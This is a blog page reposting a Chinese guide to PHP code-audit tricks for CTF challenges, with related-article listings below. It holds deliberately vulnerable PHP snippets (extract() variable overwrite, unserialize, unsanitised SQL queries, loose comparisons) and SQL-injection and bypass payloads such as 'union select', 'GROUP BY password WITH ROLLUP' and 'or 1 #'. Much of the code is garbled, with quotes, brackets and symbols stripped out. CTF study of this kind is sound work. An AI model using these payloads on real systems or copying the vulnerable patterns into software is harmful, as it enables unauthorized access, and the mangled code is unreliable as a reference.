php代码审计ctf隐藏了目录,ctf中的php代码审计技巧 作者未知_W

最新推荐文章于 2021-04-12 08:53:59 发布
最新推荐文章于 2021-04-12 08:53:59 发布
阅读量292 收藏
点赞数
文章标签: php代码审计ctf隐藏了目录

《ctf中的php代码审计技巧 作者未知_W》由会员分享,可在线阅读,更多相关《ctf中的php代码审计技巧 作者未知_W(15页珍藏版)》请在人人文库网上搜索。

1、ctf中的php代码审计技巧 作者:未知原文链接:http:/www.am0s.com/ctf/200.html收集整理:http:/www.nmd5.com/test/index.php本文由 干货12暂无公告 敏感函数 Home CTF ctf中的php代码审计技巧 ctf中的php代码审计技巧2017-02-07做ctf题时,遇到审计题时可能会遇到,翻翻记录可以很快的找到脑洞。 1.PHP123456PHP extract() file_get_contentsshiyan=&flag=1PHP123456789101112131415$flag=xxx; extract($_GET);。

2、 if(isset($shiyan)$content=trim(file_get_contents($flag); if($shiyan=$content)echoctfxxx;elseechoOh.no;内容纲要32.PHP123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354$value)$value = trim($value);is_string($value) & $req$key = addslashes($value);function 。

3、is_palindrome_number($number) $number = strval($number);$i = 0;$j = strlen($number) - 1; while($i where)$this-select($this-where);function select($where)$sql = mysql_query(select * from user where .$where);/ MySQLreturn mysql_fetch_array($sql);/if(isset($requsettoken)false/truefalse$login = unserial。

4、ize(gzuncompress(base64_decode($requsettoken);/gzuncompress:/unserialize:PHP$db = new db();$row = $db-select(user=.mysql_real_escape_string($loginuser).);/mysql_real_escape_string()if($loginuser = ichunqiu)echo $flag;SQLelse if($rowpass !=$loginpass) echo unserialize injection!;elseecho ( ) ;elsehea。

5、der(Location: index.php?error=1);?4.5PHP12345?php$arr = array(user = ichunqiu);$a = base64_encode(gzcompress(serialize($arr); echo $a;?12345678910111213141516171819202122232425262728293031323334353637383940414243444546476PHP1234567891011121314151617181920212223242526272829303132333435363738394041424。

6、3444546474849505152535455565758?php error_reporting(0);if (!isset($_POSTuname) | !isset($_POSTpwd) echo form action= method=post.br/; echo input name=uname type=text/.br/; echo input name=pwd type=text/.br/; echo input type=submit /.br/;echo /form.br/;echo !-source: source.txt-.br/; die;functionAtta。

7、ckFilter($StrKey,$StrValue,$ArrReq) if (is_array($StrValue)/$StrValue=implode($StrValue);/if (preg_match(/.$ArrReq./is,$StrValue)=1)/print ;exit();$filter = and|select|from|where|union|join|sleep|benchmark|,|(|); foreach($_POST as $key=$value)/AttackFilter($key,$value,$filter);$con = mysql_connect(X。

8、XXXXX,XXXXXX,XXXXXX); if (!$con)die(Could not connect: . mysql_error();$db=XXXXXX;mysql_select_db($db, $con);/ MySQL$sql=SELECT * FROM interest WHERE uname = $_POSTuname;$query = mysql_query($sql);/ MySQLif (mysql_num_rows($query) = 1) /759$key = mysql_fetch_array($query);/falseif($keypwd = $_POSTpw。

9、d) print CTFXXXXXX;elseprint ;elseprint ;mysql_close($con);?60 61 62 63 64 65 66 67 68 69 70 71 72 73 5.PHP123ereg payload 1e9%00*-*%00PHP12345678910111213141516171819202122232425?phpif (isset ($_GETpassword)if (ereg (a-zA-Z0-9+$, $_GETpassword) = FALSE)echo pYou password must be alphanumeric/p;else。

10、 if (strlen($_GETpassword) 8 & $_GETpassword 9999999)if (strpos ($_GETpassword, *-*) != FALSE)die(Flag: . $flag);elseecho(p*-* have not been found/p);elseecho pInvalid password/p;?PHP1admin GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1- -86.PHP1 if (isset($_GETa) 2 if (strcmp($_GETa, $flag) = 0) 3/。

11、4 die(Flag: .$flag);5 else6 print ; 7 8PHP1 payload:?a=1 2漏洞原理http:/www.am0s.com/functions/201.htmlPHP15.3strcmp 07.PHP1 ?php2 if (isset($_GETname) and isset($_GETpassword) 3 4 if ($_GETname = $_GETpassword)5 echo pYour password can not be your name!/p;6 else if (sha1($_GETname) = sha1($_GETpassword。

12、)7 die(Flag: .$flag);8 else9 echo pInvalid password./p; 10 11 else12 echo pLogin first!/p; 13 ?14PHP1 =bool2 sha1()md5()sha1()sha1()3 ?name=a&password=b8.PHP?php session_start();if (isset ($_GETpassword) if ($_GETpassword = $_SESSIONpassword) die (Flag: .$flag);elseprint pWrong guess./p;mt_srand(mic。

13、rotime() rand(1, 10000) % rand(1, 10000) + rand(1, 10000);?9.9PHP1234567891011121314151617181920212223242526272829303132333435?phpif($_POSTuser & $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(phpformysql) or die(Could not select database); if ($conn-connect_error) die(Connection failed。

14、: . mysql_error($conn);$user = $_POSTuser;$pass = md5($_POSTpass);$sql = select pw from php where user=$user;$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if ($rowpw) & (!strcasecmp($pass, $rowpw) /st。

15、r1str2 0str1str2 0 0echo pLogged in! Key:* /p;else echo(pLog in failure!/p);?PHP1cookiesession1234567891011通过构造sql语句使rowpw等于pass10.正则漏洞,%00截断 11.10PHPPHP1234567891011121314?php if(eregi(hackerDJ,$_GETid) echo(pnot allowed!/p); exit();$_GETid = urldecode($_GETid); if($_GETid = hackerDJ)echo pAccess g。

16、ranted!/p;echo pflag: * /p;?1112345678910111213141516171819202122232425262728293031?phpif($_POSTuser & $_POSTpass) $conn = mysql_connect(*, *, *); mysql_select_db(*) or die(Could not select database); if ($conn-connect_error) die(Connection failed: . mysql_error($conn);$user = $_POSTuser;$pass = md5。

17、($_POSTpass);$sql = select user from php where (user=$user) and (pw=$pass);$query = mysql_query($sql); if (!$query) printf(Error: %sn, mysql_error($conn); exit();$row = mysql_fetch_array($query, MYSQL_ASSOC);/echo $rowpw;if($rowuser=admin) echo pLogged in! Key: * /p;if($rowuser != admin) echo(pYou a。

18、re not admin!/p);?闭合注入,绕过验证 12.PHP?phpfunction GetIP() if(!empty($_SERVERHTTP_CLIENT_IP)$cip = $_SERVERHTTP_CLIENT_IP;else if(!empty($_SERVERHTTP_X_FORWARDED_FOR)$cip = $_SERVERHTTP_X_FORWARDED_FOR;else if(!empty($_SERVERREMOTE_ADDR)$cip = $_SERVERREMOTE_ADDR;else$cip = 0.0.0.0;return $cip;$GetIPs =。

19、 GetIP();if ($GetIPs=1.1.1.1)echo Great! Key is *;elseecho ?IP;添加http头即可13.240610708神奇的数字 14.12PHPPHP12345678910111213?php$md51 = md5(QNKCDZO);$a = $_GETa;$md52 = md5($a); if(isset($a)if ($a != QNKCDZO & $md51 = $md52) echo nctf*; else echo false!;elseecho please input a;?123456789101112131415161718。

20、1920212223?php if($_GETid) mysql_connect(SAE_MYSQL_HOST_M . : . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$id = intval($_GETid);$query = mysql_fetch_array(mysql_query(select content from ctf2 where id=$id); if ($_GETid=1024) echo pno! try again/p;elseecho($querycont。

21、ent);?1024.115.此处还可以数组绕过16.13PHPPHP123456789if (isset ($_GETnctf) if (ereg (1-9+$, $_GETnctf) = FALSE) echo ;else if (strpos ($_GETnctf, #biubiubiu) != FALSE) die(Flag: .$flag);elseecho ;123456789101112131415#GOAL: login as admin,then get the flag;error_reporting(0); require db.inc.php;functionclean。

22、($str) if(get_magic_q uotes_gpc()$str=stripslashes($str);return htmlentities($str, ENT_QUOTES);$username = clean(string)$_GETusername);$password = clean(string)$_GETpassword);$query=SELECT * FROM users WHERE name=.$username. AND pass=.$password.;$result=mysql_query($query);if(!$result | mysql_num_ro。

23、ws($result) 1) die(Invalid password!);echo $flag;17.14PHP1payload:user=admin and 0=1 union select 47bce5c74f589f4867dbd57e9ca9f808 #&pass=aaaPHP12345678910111213141516171819?phpif($_POSTuser & $_POSTpass) mysql_connect(SAE_MYSQL_HOST_M . : . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select。

24、_db(SAE_MYSQL_DB);$user = $_POSTuser;$pass = md5($_POSTpass);$query = mysql_fetch_array(mysql_query(select pw from ctf where user= $user ); if ($querypw) & (!strcasecmp($pass, $querypw) /strcasecmp:0 -echo pLogged in! Key: ntcf* /p;else echo(pLog in failure!/p);?PHP1$query=SELECT * FROM users WHERE name=admin AND pass=or 1 #;1234567891011121314151617181920212215CTFadmin发表评论 *name.*email.website.SUBMIT(Ctrl + Enter) Proudlypowered bywordpress. Lion bybigfa. Made on aText message。

九十纳魔狼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【攻防世界】二十三 --- lottery --- php代码审计
qq_43168364的博客
01-03 581
题目 — lottery 一、writeup 主页网页访问没有反应,附件给了网站的源代码,对其进行审计。目录结果如下所示 查看几个关键文件的内容:robots.txt、config.php、index.php robots.txt文件给了一个/.git/目录 config.php启动了一个会话,给了两个变量 二、知识点 ......
CTFPHP代码审计2
bmth666的博客
03-11 1735
ctfphp代码审计,从入门到入土!!! 变量覆盖之:extract函数的漏洞,$$的漏洞,parse_str的漏洞 通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 由于php可以使用$$声明变量,因此当在遍历数组时可能会覆盖原来的值 全局变量的问题:bugku之变量1 空白符的问题
php源码 辅助发卡_记一次简单的php代码审计
weixin_39912163的博客
12-28 230
PHP代码审计所需工具:(1) 环境:PHPstudy我这里直接使用phpstudy。其他的如:xampp,lamp等集成环境都可以。Phpsyudy官网地址:https://www.xp.cn (2) 代码审计工具:“工欲善其事,必先利其器。”一款好的代码审计工具可以辅助我们的白盒测试,提高挖掘漏洞的效率。下面我来介绍一下两款常用的代码审计工具。1. RIPSRips是PHP语言开发的...
网站代码审计干货学习经验分享
网站安全专家
04-12 583
学习代码审计要熟悉三种语言,总共分四部分去学习。第一,编程语言。1.前端语言html/js/dom/元素的使用主要是为了挖掘xss漏洞。jquery主要写一些涉及CSRF脚本或DOMXSS、JSON劫持等。2.后端语言的基本语法要知道,比如变量类型、常量、数组(python是列表、元组、字典)、对象、调用、引用等。,MVC设计模式要清晰,因为大部分目标程序都是基于MVC写的,包括不限于php、python、java。不用写,但一定能理解,要理解逻辑,知道哪些功能点可以写,哪些漏洞可能会出现,便于挖掘常规漏洞
PHP代码审计你不知道的牛叉技术点
dfdhxb995397的博客
12-21 167
一、前言 php代码审计如字面意思,对php源代码进行审查,理解代码的逻辑,发现其的安全漏洞。如审计代码是否存在sql注入,则检查代码sql语句到数据库的传输 和调用过程。 入门php代码审计实际并无什么门槛要求,只需要理解基础的php语法规则,以及理解各种类型漏洞的出现原因则可以开始尝试审计php源代码。通常的漏洞演示sql语句会直接传入php自带的函数传入...
网络安全+CTF+源码审计+O泡易支付V1.zip
11-19
总之,这个压缩包提供了一个实践源码审计技巧的实战场景,对于提升网络安全技能,特别是对PHP Web应用的防护能力,具有很高的学习价值。通过深入分析O泡易支付V1的源码,不仅可以发现并修复安全漏洞,还能提高对CTF...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序...
CTF-Web-Challenge:使用PHP在Web进行CTF挑战
03-25
挑战可能包括编写代码、解密信息、寻找隐藏的文件或漏洞等。完成这些挑战将加深你对PHP和Web安全的理解,并使你能够更好地预防和应对现实世界的安全威胁。参与CTF挑战,不断提升自己的安全防护能力,对于任何Web...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛,编程者经常面临各种挑战,其“反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP的反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
ctf php代码审计 绕过,CTF代码审计之[HCTF 2018]WarmUp
weixin_32019577的博客
04-11 619
[HCTF 2018]WarmUp{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return f...
代码审计-phpcms
小刚的博客
12-14 482
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 phpcms代码审计代码审计-phpcms低版本phpcms通读代码目录结构网站入口返回头看上面加载的几个函数库查看自动加载函数跳回index.php参数传递开始审计端口探测后台GetshellSQL注入 代码审计-phpcms 最近在学习php代码审计,各种复现、各种测试搞得我头昏脑胀。网上很多代码审计的复现博客看似讲的很清楚,最后自己也复现出来了,但是很多小白(比如我)以为懂了这个漏洞,但实际.
CTFshow——PHP特性(上)
D.MIND 的博客
02-09 1590
web89——preg_match函数 、数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } preg
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 3772
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛,代码...
php get请求_ctf关于php伪协议的考查
weixin_39928003的博客
11-30 495
原创:Archerx 合天智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
ctf.show WEB入门-php特性系列
~airrudder~
09-21 1987
WEB入门 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 由于intval(array(.
狼组CTF WEB题 代码审计之代码注入
tempulcc的博客
09-02 654
献上源码 <?php show_source(__FILE__); error_reporting(0); $you = "you are ?"; extract($_POST); if($you != 'i am pig'){ echo '<img src="./Ding.gif">'."</br>"; die('Ding Ding Ding ~'); } $peiqi = ["y","eval","assert","print_r","system", "
php伪协议漏洞_文件包含漏洞+PHP的伪协议
weixin_31706903的博客
01-17 379
BugkuCTF点击发现url有 ?file=show.php 并且题目flag在index里 猜测文件包含和PHP伪协议。猜测php://被过滤构造payload?file=php://filter/read=convert.base64-encode/resource=index.php用base64解码找到flagBugku-ctferror_reporting(0);if(!$_GET[...
bugku ctf 代码审计 extract变量覆盖
qq_42777804的博客
05-21 2551
<?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> extract() 函数从数组将变量导入到当...
ctf 代码审计题目
最新发布
10-21
代码审计题目是CTF比赛的一种常见类型,要求参赛者对给定的代码进行分析和审计,找出其的漏洞并进行利用,最终获取flag(标志性字符串)。 在代码审计题目,参赛者需要对给定的代码进行仔细的分析,找...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值